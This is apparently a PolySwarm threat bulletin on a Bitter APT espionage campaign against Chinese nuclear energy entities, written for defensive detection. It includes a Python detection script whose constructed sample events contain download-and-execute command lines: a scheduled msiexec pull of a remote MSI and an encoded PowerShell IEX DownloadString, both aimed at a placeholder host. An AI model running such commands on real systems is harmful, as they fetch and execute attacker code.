The PolySwarm Blog


Bitter APT Campaign Targets Energy Sector

Apr 10, 2023 1:22:19 PM / by The Hivemind

Verticals Targeted: Energy

Executive Summary

A recent Bitter APT campaign targeted nuclear energy entities in China. The threat actors used multiple techniques to obtain access to the victim machine, maintain persistence, and download and execute next-stage payloads.

Key Takeaways

  • Bitter APT recently launched an espionage campaign targeting energy sector entities in China.
  • The threat actors used a phishing lure masquerading as a conference invitation from an embassy attaché.
  • The threat actors used both CHM and Excel payloads and employed multiple techniques intended to evade detection and analysis.

The Campaign

Intezer recently reported on a Bitter APT campaign targeting nuclear energy entities in China. The threat actors engaged targets with a phishing campaign whose lures purported to come from the Embassy of Kyrgyzstan in Beijing, inviting the recipient to a conference related to their field. Each email carries an attached RAR archive containing a CHM or Excel payload, and the message body is written to entice the recipient into opening it. To lend the email legitimacy, the threat actors used the name of an actual attaché at the embassy.

In the campaign, the threat actors used multiple malicious payloads, which were compressed into RAR files. The payloads are intended to maintain persistence in the victim network and download additional malware payloads.

The Excel payloads exploit a vulnerability in the legacy Equation Editor (EQNEDT32.EXE) to run code that creates two scheduled tasks: one that downloads the next-stage payload and another that attempts to execute the newly downloaded payload.

The CHM files (Microsoft Compiled HTML Help) are used to execute arbitrary code and to create scheduled tasks. This gives the threat actor persistence on the victim machine with very little user interaction: opening the help file is enough to start the infection. Because CHM content is stored with LZX compression, the embedded script is invisible to static scanners that do not decompress the archive before inspecting it. One version of the CHM file creates a scheduled task that uses msiexec, a living-off-the-land binary (LoLBin), to fetch and execute a remote MSI package hosted on the C2. Another version performs similar activity through an encoded PowerShell command stage.
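The tradecraft described for both payload types (a document handler spawning schtasks.exe, a task action that points msiexec at a remote MSI, and an encoded PowerShell stage that has to be decoded before it can be inspected) maps directly onto process-creation telemetry. The following Python is an added example written for this bulletin, not code from PolySwarm or from the Intezer report. The Sysmon-style events it scans are constructed, the hostnames in them are placeholders (example.invalid), and the direct hh.exe to schtasks.exe parent relationship is an assumed simplification of the real process chain.

```python
"""Detection logic for the Bitter APT CHM / Excel tradecraft (added example, not PolySwarm's code).

Input is a list of JSON lines shaped like Sysmon Event ID 1 (Image, ParentImage, CommandLine,
ProcessId). The events below are constructed for the example; they are not real telemetry.
"""
import base64
import json
import re

# Parents that should not normally be creating scheduled tasks: the HTML Help executable
# (launched when a .chm is opened) and the Equation Editor process spawned by Excel.
# Assumption: the task is created directly by these parents rather than via cmd.exe.
SUSPICIOUS_SCHTASKS_PARENTS = {"hh.exe", "eqnedt32.exe", "excel.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE)
DOWNLOAD_EXEC = re.compile(r"(downloadstring|downloadfile|invoke-webrequest|iex)", re.IGNORECASE)


def encode_powershell(script):
    """Produce a -EncodedCommand argument the way PowerShell expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_powershell(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None if absent/invalid."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the list of detection names that fire for one process-creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    lowered = cmd.lower()
    hits = []

    # 1. Document handler (CHM viewer / Equation Editor) spawning schtasks.exe: persistence.
    if image == "schtasks.exe" and parent in SUSPICIOUS_SCHTASKS_PARENTS:
        hits.append("schtasks_from_document_handler")

    # 2. Task whose action is msiexec with a remote package: the LoLBin download-and-execute stage.
    if image == "schtasks.exe" and "/create" in lowered and "msiexec" in lowered and REMOTE_URL.search(cmd):
        hits.append("schtasks_msiexec_remote_msi")

    # 3. msiexec itself launched with an http(s) package path (fires when the task runs).
    if image == "msiexec.exe" and REMOTE_URL.search(cmd):
        hits.append("msiexec_remote_package")

    # 4. Encoded PowerShell: flag it, then decode and look for download/execute primitives.
    if image == "powershell.exe" and ENCODED_FLAG.search(cmd):
        hits.append("powershell_encoded_command")
        plain = decode_encoded_powershell(cmd)
        if plain and DOWNLOAD_EXEC.search(plain):
            hits.append("powershell_encoded_download_exec")
    return hits


def scan(event_lines):
    """Run classify over JSON event lines; return {ProcessId: [detections]} for events that fire."""
    findings = {}
    for line in event_lines:
        ev = json.loads(line)
        hits = classify(ev)
        if hits:
            findings[ev["ProcessId"]] = hits
    return findings


# Constructed sample telemetry (not real data). example.invalid is a placeholder C2 host.
SAMPLE_EVENTS = [
    json.dumps({"ProcessId": 1001, "Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r'"C:\Windows\hh.exe" C:\Users\u\Downloads\invite.chm'}),
    json.dumps({"ProcessId": 1002, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\hh.exe",
                "CommandLine": 'schtasks /create /sc minute /mo 15 /tn Update /tr "msiexec /i http://example.invalid/u.msi /q"'}),
    json.dumps({"ProcessId": 1003, "Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
                "CommandLine": "msiexec /i http://example.invalid/u.msi /q"}),
    json.dumps({"ProcessId": 1004, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "ParentImage": r"C:\Windows\System32\svchost.exe",
                "CommandLine": "powershell -nop -w hidden -enc "
                + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")}),
    json.dumps({"ProcessId": 1005, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
                "CommandLine": "schtasks /query /tn Update"}),  # benign: no /create, ordinary parent
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Event 1005 is a benign schtasks query from cmd.exe and fires nothing; the three malicious events each fire the rule for their stage. Decoding the -EncodedCommand argument as UTF-16LE matters: decoding it as UTF-8 yields interleaved null bytes and the download/execute pattern will not match.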

Who is Bitter APT?

Bitter APT is a threat actor group thought to operate out of South Asia. The group primarily engages in espionage campaigns. Bitter APT has previously targeted government and energy sector entities in Pakistan, China, Saudi Arabia, and Bangladesh.

IOCs

PolySwarm has multiple samples associated with this campaign.

eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e
cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179
8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74
33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799
5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc
ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1
b2566755235c1df3371a7650d94339e839efaa85279656aa9ab4dc4f2d94bbfa

You can use the following CLI command to search for all Bitter APT samples in our portal:

$ polyswarm link list -f BitterAPT




Topics: Threat Bulletin, China, Energy, South Asia, Bitter APT, Nuclear
